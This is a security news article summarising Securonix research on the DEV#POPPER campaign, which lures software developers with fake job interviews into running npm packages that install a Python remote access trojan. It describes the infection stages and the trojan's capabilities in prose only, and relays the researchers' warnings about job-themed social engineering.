Cybersecurity company Securonix has discovered a new ongoing social engineering attack campaign that targets software developers with bogus npm packages on the pretext of fake job interviews and tricks them into downloading a Python-based remote access trojan (RAT).
Based on the observed tactics, the Securonix Threat Research Team, which has tracked the activity under “DEV#POPPER,” has allegedly linked the campaign to North Korean threat actors.
“During these fraudulent interviews, the developers are often asked to perform tasks that involve downloading and running software from sources that appear legitimate, such as GitHub. The software contained a malicious Node JS payload that, once executed, compromised the developer’s system,” said security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov in a blog post.
However, the aim of the threat actor is to deceive targets into downloading malicious software that collects system information and enables remote access to the host.
In the first stage, a zip archive from GitHub disguised as an offer to fill software developer positions is sent to the interviewee (in this case, the developer) for download by the interviewer (the attacker). The archive contains a legitimate-looking Node Package Manager (NPM) package containing a README.md and Frontend and Backend directories.
Once the developer executes the malicious NPM package, an obfuscated JavaScript file (“imageDetails.js”) is executed through the NodeJS process (node.exe) using ‘curl’ commands. The malicious script’s purpose in the first stage is simply to download an additional archive (“p.zi”) from an external server.
Inside the archive is the next stage payload, a hidden Python file (“.npl”) that functions as a RAT. Depending on their operating system settings, this Python file may or may not be hidden from view to the user.
Once the RAT is active on the victim’s system, it collects system and network information from an infected computer and then sends this data to the command and control (C2) server, including OS type, hostname, OS release version, OS version, the username of the logged-in user, and a unique identifier for the device (uuid) generated by hashing the MAC address and username.
According to Securonix analysts, the RAT supports the following capabilities:
- Networking and session creation are used for persistent connections.
- File system functions to traverse directories, filter files based on specific extensions and directories to exclude, and search for and steal specific files or data.
- Remote command execution that allows for the execution of system shell commands and scripts, including browsing the filesystem and executing shell commands.
- Direct FTP data exfiltration from various user directories like Documents and Downloads.
- Clipboard and keystroke logging includes capabilities to monitor and exfiltrate clipboard contents and keystrokes.
“When it comes to attacks which originate through social engineering, it’s critical to maintain a security-focused mindset, especially during intense and stressful situations like job interviews,” the researchers added.
“The attackers behind the DEV#POPPER campaigns abuse this, knowing that the person on the other end is in a highly distracted and in a much more vulnerable state.”
Securonix recommends people remain extra vigilant, as fake job opportunities are often used as bait to infect people with malware.
For those unaware, in late November 2023, Palo Alto Networks Unit 42 researchers discovered two separate campaigns targeting job-seeking activities linked to North Korean state-sponsored threat actors.
In the first campaign, “Contagious Interview,” threat actors posed as employers to lure software developers into installing malware through an interview process that created the potential for various types of theft.
On the other hand, the second campaign, “Wagemole,” sought unauthorized employment with organizations based in the U.S. and other parts of the world, with potential for both financial gain and espionage.
